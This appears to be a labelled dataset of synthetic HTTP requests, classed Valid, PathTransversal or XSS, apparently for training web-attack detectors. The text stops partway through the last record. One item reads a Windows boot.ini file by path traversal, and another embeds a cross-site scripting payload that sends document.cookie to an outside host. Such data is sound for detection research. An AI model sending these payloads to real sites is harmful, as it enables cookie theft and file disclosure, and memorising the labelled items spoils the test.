End - Id: 48046
Start - Id: 16600
class: Valid
GET /mnE.htm?QCnZa5VuJz_=raIde&Tpa9utatzseafww=gIWn6CPhf%40Gh&njet=0&i1si5th0nerfo=1&ED8dwindow.openfromopenautoexec.=ubesam&qemi4fur5tjP=rTa&hacces=8&i0ehueg8mrz=%29ebetween&hnPt6nttn=Uge9&jbodyobjectFVs2A8N=l&LE1dkUm=05066 HTTP/1.1
Host: 60.90.241.4
Connection: cpabr
Accept: image/gif, text/html, text/*
Accept-Charset: *;q=0.4
Accept-Encoding: identity
Accept-Language: thoaRke-Wyb, ga1tf7-ritcp;q=0.5, LsVsev-mhnt1emo
Cache-Control: only-if-cached
Client-ip: 115.162.152.91
Cookie: T2clib_dTXyCd0a=083583;yEo4fnNro=oM1V8OEd4XWF;5qorOdU2VtGvar=\eu;aa'c]fhnLNdfnNhb;ei=3;cteo9q=06181;msan2zl=swoy
Cookie2: $Version="845"
Date: Mon, 03 Dec 07 24:24:06 GMT
ETag: "MX6JygOzoRFse2K7NF7"
Expect: lenu=baie;r4Re1
From: dwou@hguthnrf9e.org
If-Modified-Since: Thu, 01 Jul 04 19:41:37 GMT
If-Unmodified-Since: Tue, 19 Apr 05 18:37:30 CET
If-Match: "eOO3s4ImgYYQQhrQzMbB"
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 20
MIME-Version: 6.1
Pragma: ecliso2e=n57sees
Proxy-Authorization: Digest qop=ensne
Authorization: Digest qop=auth-int
Range: -508053,86460-25,-68
Referer: /ettt.doc
TE: trailers,chunked
Trailer: Connection
User-Agent: aelhyoe/6.6.0
UA-CPU: x86
UA-Disp: 1704,0727,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1536x5641
Via: 0.1 www.rnnr1ty.js:26845, 1.9 www.emnw9ldi.shtml:941
Transfer-Encoding: compress
Upgrade: elllth/8.1, tsut8/2.1, egdusr/1.6
Warning: 302 www.iatetm.shtml "Tetamelsqnttnkl0otnA" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16600
Start - Id: 6926
class: Valid
POST /ae/lyw_dDYfDTB./cCoJdS5K1L0V/hn/sam0a1Jv0/dsEoplrcmaufr/scVbodytQMZtmpIOV9/fhi4N.pl? HTTP/1.1
Content-Length: 245
Content-Language: Ci,ntseLchX
Content-Encoding: compress
Content-Location: http://aare.uk/uvTieAh/bwlanaI/smstansj.mdb
Content-MD5: dG9QZmpuZWFveEdydGVybg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jul 04 01:09:28 CET
Last-Modified: Thu, 05 Jun 08 18:03:44 UTC
Host: www.rfRhe.fr
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: x-mac-icelandic;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: ye3ulimh-2hhj, begn-htvs, 1tsznta-ny6u;q=0.8, oa4wsane-enpZn
Cache-Control: min-fresh=1
Client-ip: 238.62.141.37
Cookie: ce=a h
Cookie2: $Version="5"
Date: Wed, 03 Oct 07 18:31:12 CET
ETag: "F0InPzND1SA8bpq5cJPP"
Expect: hIio
From: yo9el@iae0gwfot.st
If-Modified-Since: Sun, 13 Jun 04 17:39:11 GMT
If-Unmodified-Since: Mon, 24 May 04 22:25:00 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Oct 07 22:29:50 UTC
Max-Forwards: 01
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: obntn ETroq=muk2
Authorization: Digest username="ta2oh"
Range: -35,310954-4,-65030
Referer: /ibr8/ddhNt/6e8l.htm
TE: gzip
Trailer: From
User-Agent: Mozilla/9.0 (X11; U; Solaris 4.0; su-9a; rv:3.7.4) Gecko/64913702
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9121x8354
Via: er1l99/8.1 214.61.47.53, FTP/5.8 125.123.19.144, FTP/4.4 100.195.15.15:3275
Transfer-Encoding: gzip
Upgrade: uppMei/3.0
Warning: 403 www.7lhrdW5D.png:79936 "GNhj" "Fri, 05 Jun 09 03:22:17 GMT"
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 311516057491
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

essmn6urih7=625&qtuetoniqru=93<& connectSo-i&7thetwotdhgE2sa=0nkfoAs&ei4rgnr7n=l&AaesqlLeggo=6453033&rrthjgoifR6coDe=oa&AU9nn=|htaccesOh&7eh=e&aaei=e c'&taisutuBp=nenhttpseumn&_dNpasswdp=8950&TwGUxtermu=rfza4zS&necseoeny=ntnofnideyns>i

End - Id: 6926
Start - Id: 2730
class: Valid
GET /ax/7unetNrds0rrttmipsev/osp/petdoa3csAlgts/lu1Arnsdgit7air/hn.xw/a9BpWiaP/wTCYO.gif? HTTP/1.0
Host: www.rnnuroar.st
Connection: me3eaq
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 124.185.123.86
Cookie: pservicesn@MNYkPEJ=96;rqiq=iddOhsvardt;asTO5rgC=12355;ieeas48gkeel3oe=tYYH9xvuK;ezecisb8a5=nn0Ryqnlt;ecuanS=j xaaE 
Cookie2: $Version="32"
Date: Thu, 18 May 06 16:10:00 UTC
ETag: W/"TKymIOMp0O3b3gZ"
Expect: u70trk
From: dasa@Cnth.cz
If-Modified-Since: Fri, 05 Mar 04 17:54:45 CET
If-Unmodified-Since: Sat, 19 Dec 09 24:30:06 UTC
If-Match: "6nrjM3P3rO-KPMybv"
If-None-Match: "hQh@c@drJabEj4uL1_"
If-Range: "koxUpST5kAcstLboZG"
Max-Forwards: 29
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: evtb vfncnl=aynse3n1
Range: -1
Referer: http://eed8hTp.fr/eewesh/guyeanoa/tic1/ftnr/ctbel.cgi
TE: chunked;q=0.7,trailers,deflate
Trailer: From
User-Agent: Mozilla/9.4 (compatible; Konqueror/6.2; Unix; 7deeulp)
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9002x158
Via: 9.7 149.23.244.117:2679
Transfer-Encoding: gzip
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 987 20.13.130.4:179 "sqoaaAAcoxibdrstie" 
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2730
Start - Id: 35988
class: PathTransversal
PUT /stt7eu0cagNa/e5tev8deumbtportt/o4vcimna5r/0n3replaceWOGjC.php4? HTTP/1.0
Content-Length: 128
Content-Language: 6urpclu,eskoyr,tptn
Content-Encoding: compress
Content-Location: /oMmne/tah5Brsa.php
Content-MD5: bDYyZXMycmNhZm55aHBlMg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Sep 07 08:39:58 GMT
Last-Modified: Sat, 05 May 07 08:57:54 CET
Host: www.xuoNEf.st
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 221.251.39.195
Cookie: eatlpa3teDu=390;2ets3=lzpof;pecgge=d'3tt;2qPAxKhCMi=07;TGnjcvoe=phaving;erizuseemAonATt=99
Cookie2: $Version="01"
Date: Tue, 02 Sep 08 08:16:52 CET
ETag: W/"Ek3BXcozS.u2Oc09Vcd"
Expect: 100-continue
From: n9oihnc@wyzeClnr5e.ch
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Mon, 15 Feb 10 21:47:21 UTC
If-Match: "KYyNckA9haFULJFL-s8w"
If-None-Match: "iKir9LhZTNKF8Wn"
If-Range: Tue, 27 Jul 04 24:14:13 CET
Max-Forwards: 050
Pragma: ourn='et7eh'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: NTLM aGNubnBvaWpyZXBpaWVuQXNycE5nYjYwek85QWhuRXV3YXdz
Referer: /gASao/a0rtg/alg6sd/Deyeii/chioay.jpg
TE: deflate;q=0.5
Trailer: Authorization
User-Agent: lcmZntTwNi4fa9mrlg
Via: FTP/3.0 www.ehecsau.jpg, 8.4 232.137.28.230, 1.1 117.16.154.149:8
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 121.207.12.204
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nSiaryto5=cFEK@vMYHC&ctbh7ouyg=i:\windows\boot.ini&Z._d_Hj=pegDiSbdih&td5dcas3pesa=bchtAbqysspgp1n7l&ndraAaestaoTse=0410

End - Id: 35988
Start - Id: 46574
class: XSS
GET /E.S2PsY/ea7Jcvwg29_580cmfk/oeap3sriaiEB/eBqxA-x/oi7esatoGh6tNtaihees/r1aVw97-wpqE/.sByxUaccepteF8iZIcI/iadft4jEp.msf?ol=8975822&fiOhehaolji7tit=4&svo=ial5i&de8a=arrw3it1daiivRe2c&ytisLrsnrssQ=6020484 HTTP/1.1
Host: www.4ptnaetka7.st
Connection: mnihhm
Accept: application/x-tar, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: <input    type  =  "  image  "     dynsrc=  "   javascript: [document.location.replace   ('http://www.de.com/cgi-bin/itde.cgi'+document.cookie);]  "    >
Accept-Language: heig6cu-nant;q=0.2, kSp-2oocesq, ssen-hekacd;q=0.3, rdosenem-Os;q=0.1, l-ner5zTqx
Cache-Control: no-store
Client-ip: 140.154.179.232
Cookie: asedevuourst=Eo;RtMeekK=po8urm6fiNacritt
Cookie2: $Version="1"
Date: Fri, 09 Oct 09 22:12:32 CET
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: oai0tt
If-Modified-Since: Fri, 24 Apr 09 06:47:20 CET
If-Unmodified-Since: Sun, 27 Jul 08 02:57:14 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 15 Feb 08 09:28:46 CET
Max-Forwards: 972
MIME-Version: 3.9
Pragma: q1we='mludrnf'
Proxy-Authorization: NTLM ZW5sbjJUbW1uaGhjbUxoY3I1aTR0NmNqZG41b2pzaG55
Authorization: Digest realm
Range: 70-
Referer: http://tetda.biz/nd2as/tnxer.mdb
TE: deflate,trailers,trailers
Trailer: If-Match
User-Agent: tcllItmeo/4.6.0.8.4
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 1.5 2.25.31.149, 9.3 65.91.116.162, 1.1 18.119.99.179:9
Transfer-Encoding: gzip
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 061 www.jmFttlrn.js "lnQacp2ufeTocbi0I" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46574
Start - Id: 1686
class: Valid
GET /eheshDeEipotitga/hafW2XsxbyWA-N1SVF/eJ7rtdzs3esleaehr/oy/eeoataKelilhagoet8Lt/cXgzSIa-DpWJZ/0p42@dBAo/GpPpS.jpeg?iurines=hWJj%3Cnt&pn6stAc9xa9miau=365127&lr0spgfHili=537280&oS=oSDVcpP8Hg_&.VSGmKp4e=shutdowngty&67rmL8aa=gte&tteaac13PN4Edh=NaanDd&rlsreoeni=81754000&oluee8loaje=5538798618&spaleiumhecinui=8&iues=5t+chm+rp&frp=sz6NC&svdfe6l=dcrRaji+e%3A&CoBx0Fgz=eiyyF&mocha@Rnullw.p81Cxml=3-evaleeoA HTTP/1.1
Host: 4.128.103.171:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.7, koi8, utf-8, macintosh, iso-8859-15
Accept-Encoding: 
Accept-Language: tgfao-I5ads;q=0.2, swoezh-o;q=0.1, tsd4-yo;q=0.0, egu-oth4n;q=0.4, eo-hnev;q=0.2
Cache-Control: min-fresh=8986
Client-ip: 170.241.66.105
Cookie: 3lotowwesfeiel=Ttcalnzui;hmhesdeTen=7431465;i4Remcrbnaefjae=b;rBdrophnph-igroup bys|&tLd jinclude%;eoeihr9=7/abg>ea
Cookie2: $Version="033"
Date: Wed, 03 Dec 08 01:32:24 GMT
ETag: W/"Guq8N-HdhkeH6XJ1-_"
Expect: oeontso=mhebs;aosd=0gc1px
From: iNaNl@nioce.ch
If-Modified-Since: Thu, 26 Jan 06 15:47:58 CET
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Aug 06 24:41:06 GMT
Max-Forwards: 2
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest username="o3aarj"
Authorization: mt4rn e5uawb=hagna
Range: 73-
Referer: http://www.enqy.biz/aEuao/etizHz/r5eram/diahct.msf
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: benHSthlak (t5mFTw; c7ljjxP7S9; shc3GTO; ak-ZD8k; nc5CoJhP8)
UA-CPU: StrongARM
UA-Disp: 257,6505,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/1.4 13.27.43.58, 1.1 78.92.97.26
Transfer-Encoding: identity
Upgrade: edsh/1.1, 0e3eaA/2.7, 9eisMe/2.7
Warning: 300 92.186.4.96 "i1U7e" "Sat, 28 Feb 04 05:11:20 CET"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1686
Start - Id: 24041
class: Valid
GET /mfha7d7iR4egdtExd8/0_R.qVnU5@YX/4axWryNWQ/eAk@WpR0PbHIK-ABTqEW/ciuiuiwetiMrehxw/i4a9SiOlF.KImoFr4m/metanlC7boot.iniTfHO/teearet/hBh5M9wXxoXawlNe/sa/BxCchaa5onete/caao7h0Rau.cfm?0asVozLmq=tiframee&e60oni2=t6n+n&cRSRnN=shas+rn%24dj9n%3B&lsdiSd=kQqraeand&8toea=ygachrrxil&dSud=sosoughOeuaxttgaoe&pidqe3go=p&jhouh2eohashi=084487&lbss=seLokahoanyo1wa&e669nnd7z=leidIoer&Onm=5561&4lbrso9mitnLa=rXrfndnole&uotaagytierc=eKrn&sbreykshd7=qe%3AgbrlI%26r&jr7aha=37426672 HTTP/1.1
Host: 82.138.169.193
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: taYw-k, tRantao-g, rrsat-sn;q=0.9, 1eetl-pnttl;q=0.4, 1bDhho-dvt;q=0.6
Cache-Control: min-fresh=870
Client-ip: 247.17.71.84
Cookie: mejwXpertGizya=Iea
Cookie2: $Version="03"
Date: Thu, 28 Jul 05 07:54:16 GMT
ETag: W/"20wIx6HmMcAyfM-Ple"
Expect: era0lhbh
From: ategn@e61x0hpQf.ch
If-Modified-Since: Mon, 04 Oct 04 10:36:55 UTC
If-Unmodified-Since: Wed, 15 Jun 05 02:45:15 UTC
If-Match: *
If-None-Match: *
If-Range: "uzxGPqGG4cAUyddT"
Max-Forwards: 9686
MIME-Version: 5.8
Pragma: l=NlLefsTn
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: lnooe 7tatmoTa=ubrUp
Range: 3-,-932
Referer: http://ioko.uk/igareabi.cgi
TE: trailers
Trailer: Date
User-Agent: mleaL/4.6.9
UA-CPU: StrongARM
UA-Disp: 6759,036,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 314x0873
Via: HTTP/7.0 202.184.252.173, nCsolt/6.5 5.212.155.103:14
Transfer-Encoding: cfeu
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 240.187.200.43
X-Serial-Number: 81619019081
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24041
Start - Id: 33038
class: Valid
PUT /tc1UiIr/QBE/tx/ei48i/lIfFfYhCDdjmWz/rIb/-ZE0FT/WbJD7PH-/dmictiw/en.tiff? HTTP/1.0
Content-Length: 30
Content-Language: Iaeu,eE
Content-Encoding: deflate
Content-Location: /gtmhKe/adpwd/ino1ioV0.mp3
Content-MD5: c3lwYWVudW90RWVvZW93YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Nov 05 16:21:47 CET
Last-Modified: Fri, 05 Sep 08 07:43:14 GMT
Host: www.eezegh.cz
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: windows-1254, utf-8;q=0.0, windows-1257;q=0.8
Accept-Encoding: 
Accept-Language: td6p-lTotu;q=0.3, i2a09vS-i, taEie-e;q=0.1, deL0ntE-ushg;q=0.2
Cache-Control: max-stale
Client-ip: 68.106.142.25
Cookie: eeceaTR=37116023;regimgeI=Y7osN;tflbrosDet=4090;Teofthtihduncny=re4 ;epi=90993413
Cookie2: $Version="02"
Date: Tue, 12 Apr 05 01:35:16 CET
ETag: W/"7Qwj45KIW9CmgO1snJq"
Expect: 100-continue
From: etht@e9emo1dtn.net
If-Modified-Since: Thu, 22 Jan 09 09:59:00 UTC
If-Unmodified-Since: Sun, 01 Nov 09 13:28:00 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Mar 06 03:11:24 UTC
Max-Forwards: 04
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic cmNhcXRzOHM6ZXRvcw==
Authorization: extc wdso=eIta6e
Range: -1,0950-
Referer: http://www.oosf.gov/tNaAgau.jpg
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 8.8; ao-bt; rv:2.5.1) Gecko/26158266
UA-CPU: StrongARM
UA-Disp: 518,6336,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 699x4175
Via: 2.4 137.254.19.65:43, A6r/1.9 www.idHd.css
Transfer-Encoding: deflate
Upgrade: eabbw/5.6, t0eah/5.1, ezh/2.6
Warning: 720 www.bomrenrn.tiff "ffytyrieot" "Sat, 25 Jun 05 21:01:28 CET"
X-Forwarded-For: 242.105.173.22
X-Serial-Number: 01279486631284
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

ete=O>4&o646aosjqwu=@ddnnq

End - Id: 33038
Start - Id: 7892
class: Valid
POST /8NILiLVTZ/obuvarBzU9_SCL8/heeno720Eee1/meRs@OimgT/oSm998buWY0@nwLs41Yl.pl? HTTP/1.0
Content-Length: 77
Content-Language: wOutt,va6ovl,8
Content-Encoding: deflate
Content-Location: http://www.Oeenc.com/aeiRe/ekhaybqr.bin
Content-MD5: YkFuc250TkNHaDNtd2VvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Jan 06 10:41:20 UTC
Last-Modified: Sun, 13 Jan 08 09:56:37 GMT
Host: 2.129.75.165
Connection: close
Accept: audio/*;q=0.2, text/html;q=0.9, application/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: identity
Accept-Language: mce-csr3uwa;q=0.4, dnnzor-zrlxa;q=0.3, oei2ot0-Bnmk;q=0.2, raIsr-ueiO0
Cache-Control: cer=arne
Client-ip: 242.184.161.176
Cookie: Rtea=execd;xtermHaWorcpiU=u);yfaNiydsyeaa=rlibk5ns;sso6hieiAsno=tkmoj;4s=6;hoFaaowsp=aigjbnrostnodee
Cookie2: $Version="00"
Date: Fri, 23 Jul 04 06:08:29 GMT
ETag: "-22cLJtVOxTieij"
Expect: 100-continue
From: Agmt7@yFotti8uR.biz
If-Modified-Since: Sat, 10 Feb 07 10:32:01 CET
If-Unmodified-Since: Fri, 20 Jun 08 14:30:33 GMT
If-Match: "0yMHa5YYPD43Dam34c"
If-None-Match: "tJXST_5zDCyTD4xfmD"
If-Range: Tue, 27 Dec 05 05:09:06 GMT
Max-Forwards: 9048
MIME-Version: 0.4
Pragma: sedls=eioa
Proxy-Authorization: Digest qop=auth
Authorization: Digest qop=auth
Range: 8674-,-34,86935-
Referer: /8htovo/tUmI/iDnoUs/iiuhpOsi.avi
TE: trailers
Trailer: Via
User-Agent: rTyeqEwnwm/7.2.2
UA-CPU: Sparc
UA-Disp: 9422,2675,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 795x581
Via: HTTP/8.9 24.65.199.174, 7.0 237.209.209.45
Transfer-Encoding: deflate
Upgrade: icEr/0.2, qtj/3.8, ic5/3.5
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 115.221.199.254
X-Serial-Number: 534170749
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neucjseyho=burM5nTnli3v&rreddsnbsl7=rE4tnweqsiiaimg~&eK=roc=hexechea~n7

End - Id: 7892
Start - Id: 22196
class: Valid
GET /ypOtsP/lzdexraYonoad/eEe1xeemd2Oota/r2l7.YE0zTSLR4h/3_/q0/@ePM_pG/jaTnsuiteih1eei/hBUDwwHVqbq/eniutiao5ZhTom/et6YpAuu.jpg?oatdt6e4=+imgsnlinkt0viaos&r2iaoneswEecte=o0-CwKwhzbd&dRthtA9wged=5ne9trSdnise&rHbMIZeHpPg=12100468&0logLn3cp=1795&edy=Eaah&ryeee=89122962 HTTP/1.1
Host: 225.141.241.45
Connection: tnbudp
Accept: audio/x-wav;q=0.2
Accept-Charset: euc-tw;q=0.5
Accept-Encoding: *
Accept-Language: r5we4-dyi8;q=0.3, dcujcona-ht;q=0.4, t5hTnt-8aheoNas;q=0.2, qhn-hm4itd;q=0.6, eyoewesj-usw
Cache-Control: no-store
Client-ip: 226.65.7.109
Cookie: 22Eca=zd@hr-rs eion dtmu 5;t9a3oen7=jo'a<xiu;ciEk3hrbtttYe=gEbe-Tat7Z4;ehj=94713;sye=44
Cookie2: $Version="902"
Date: Mon, 14 May 07 03:46:27 GMT
ETag: "0_zQzCu3BckhMp7"
Expect: sixoriu=oErhbir
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Wed, 24 Dec 08 17:21:42 CET
If-Unmodified-Since: Mon, 25 Apr 05 20:18:50 CET
If-Match: *
If-None-Match: "xKs1HNS0cFFD7QB7YB"
If-Range: Fri, 02 Apr 04 24:17:36 CET
Max-Forwards: 3261
MIME-Version: 1.6
Pragma: s9dedigt='twboeri'
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: NTLM ZW5lN21JbEVocmE0YzI5dHZlN2VvZWVSZTljbzhobXhzYXV5YWF0b3hJYXQ0dHBu
Range: 616571-065,-685
Referer: /gd2in/r1OyAaw.php
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: Mozilla/1.0 (compatible; Konqueror/4.2; Win98; ha1yeirz; esodAte; rokfx9aq)
UA-CPU: Sparc
UA-Disp: 6865,6211,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 850x114
Via: FTP/9.5 www.zcmpedTi.js:167, 8.0 www.egnOii.js, FTP/6.0 www.6osai.js:2098
Transfer-Encoding: compress
Upgrade: dtt6ee/8.3, tfTa/8.6, e3o/6.1, snle/8.8
Warning: 269 231.144.80.186 "elttysEeuzatai" "Tue, 31 May 05 09:14:48 GMT"
X-Forwarded-For: 11.11.146.50
X-Serial-Number: 29292278992836758450
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 22196
Start - Id: 1773
class: Valid
GET /diL3b/pxmn/r5silenhnx5fdbnmnn/qY_/iROk5MUXEHbi/uqqdSquj6r/htrkpOVZt/uUdx_/bMV3scT.xN5.mspx?nashAixOjuDa5=iebzoitriyei&clibKUFLOk=ab%7Cst&maofnD5nrs=MYl5zeweesc&xzVY=otey-wgett%5Crki&HenOCx1Xezw.=rb&lus7ydTaar=sot&roafenaaeyxeepu=telj3R%25%3Ahlautoexece+&DK0V_E8O3.5=0105137&OZIhtpassDCX=hnph-e&eRZhttpH=hafoeonmris&me9uhe=m&9Stoltofallue=wi HTTP/1.0
Host: www.aEteae.be:698
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.4, deflate, deflate
Accept-Language: *
Cache-Control: max-age=25
Client-ip: 21.72.18.201
Cookie: 6ssptat=1864;wkantacotcd2Ca4=ibinD;nb=ud<et)n[&
Cookie2: $Version="9"
Date: Sat, 15 Jan 05 09:26:13 GMT
ETag: W/"m4CjLAtP7IC3FCI0_aT"
Expect: 100-continue
From: hoiiT@iran.org
If-Modified-Since: Tue, 16 Feb 10 22:03:23 GMT
If-Unmodified-Since: Thu, 31 Jul 08 09:47:06 GMT
If-Match: "ibn8K2Eh88oT6bu"
If-None-Match: "fvxR.l_GdlyyK1-l"
If-Range: Thu, 05 Nov 09 12:23:47 CET
Max-Forwards: 38
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nc=CdFcC4cf
Range: 2506-
Referer: /o1E7T/6oaymIe/I3a3/bvge.wav
TE: deflate
Trailer: Accept
User-Agent: gLfuGcJG http://www.7ngnnrcf.uk
UA-CPU: PowerPC
UA-Disp: 0437,4015,8
UA-OS: Win9x
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: identity
Upgrade: idOaS/2.5, htun/6.1, alo/1.0, cCe/9.8
Warning: 429 245.130.187.92 "yektIqaee5r3rxhg" "Tue, 26 Jun 07 17:05:12 GMT"
X-Forwarded-For: 162.29.213.245
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1773
Start - Id: 32188
class: Valid
GET /owivvvczeaeh3Asts/mn0pelwn8oizefstovxk/Dgy4n/iDw3o292g5X/zP4xo_7Q/I-OwgetY/1nOeCGL/aXBMj7EjiEtEXp/dtatyWremwecmhacm/sOhds2tdteoEmR1D/VL.js? HTTP/1.0
Host: 55.117.150.252
Connection: keep-alive
Accept: text/plain;q=0.5, video/quicktime;q=0.7
Accept-Charset: ks_c_5601-1987, koi8;q=0.4, iso-8859-6;q=0.5
Accept-Encoding: identity, deflate
Accept-Language: vldmriea-tme, i5oet-h, b8l-fanewnin;q=0.8, otRory-taHaeto;q=0.3, 3xFqis1-l;q=0.8
Cache-Control: no-transform
Client-ip: 61.139.31.148
Cookie: iwe=rhsaolruEaers;oml=ro0window.open;obue=50;na=utedFi
Cookie2: $Version="095"
Date: Fri, 06 Mar 09 10:31:13 GMT
ETag: "Q5@6s8FXHF8dByi"
Expect: Rarwce=ztdSeore;sbpvwtEE=0xmcltO
From: caui@Dve3us.st
If-Modified-Since: Thu, 01 Apr 10 08:13:10 CET
If-Unmodified-Since: Mon, 15 Feb 10 24:48:53 UTC
If-Match: *
If-None-Match: "veiP8TFZT8rA5n7po"
If-Range: "KHd-uXnbQgV9zLsSf"
Max-Forwards: 5
MIME-Version: 1.9
Pragma: 4d8=r
Proxy-Authorization: werm rnqahTl=Rnzd2
Authorization: Basic bGdvcWlhbDpuYWthcw==
Range: -31011,02795-
Referer: /ntwshp/9okgdt.png
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.8 (compatible; MSIE 4.3; Open BSD i386; tauuD3Noei; Qd83g)
UA-CPU: Sparc
UA-Disp: 8263,026,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9868x2835
Via: FTP/0.1 149.199.223.154, FTP/7.9 www.tooet.html, FTP/8.8 33.86.84.101
Transfer-Encoding: deflate
Upgrade: arx0t/5.9, nloymn/5.4
Warning: 807 86.138.171.101:76709 "oswel2" "Mon, 10 Sep 07 10:52:59 CET"
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 76488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32188
Start - Id: 21343
class: Valid
GET /Dtd0ara/rsyq6ZJt/pm9ieooaYole47llcd/vIzdydA4D/RmochaRQby/iY/bkZN3Wc/arek9qbbse/nY0RR.jpeg?kIjwfiframe9=eFIzFdQVhdB&RUnuomhwSdFenDp=5bpasswdebk&fad6tdiDNeees=8sfa&TWnlretna1ewt=4890554&omeneNEtlts=p9a&RKO95U0XO=oee&imynnC6=3939&g0ovnA60dni=e+vNaeho&s8nrtnmeg=0805&kpoebcsmelneano=Rexecnc-wdservices&hv=edsXf&g_Em=nreot9lizip HTTP/1.1
Host: www.kai1epesti.be
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-9, euc-tw;q=0.5, isiri-3342, x-mac-greek
Accept-Encoding: 
Accept-Language: dS-oidbz, 3l-es;q=0.2, ctn-3;q=0.0
Cache-Control: no-store
Client-ip: 77.98.59.51
Cookie: rxtMTag9ls=14681960;iOyia4a7A5n='hEses4af\e;pn5sgnpc8ia=05t7y8];PIimuizeshcknli=uhtsnfeahulseu;uorrAhafv27thn=m<i$g;sedeOjd=6
Cookie2: $Version="088"
Date: Sat, 17 Apr 04 17:42:05 CET
ETag: "4ZoXdfDu0q2fc1O652"
Expect: 100-continue
From: ahlxburo@rectarusna.st
If-Modified-Since: Thu, 12 Jan 06 18:04:35 GMT
If-Unmodified-Since: Mon, 03 Mar 08 24:04:30 CET
If-Match: *
If-None-Match: *
If-Range: "rchHI5WGs@DYElnn0"
Max-Forwards: 7
MIME-Version: 8.3
Pragma: t=gNp1ee
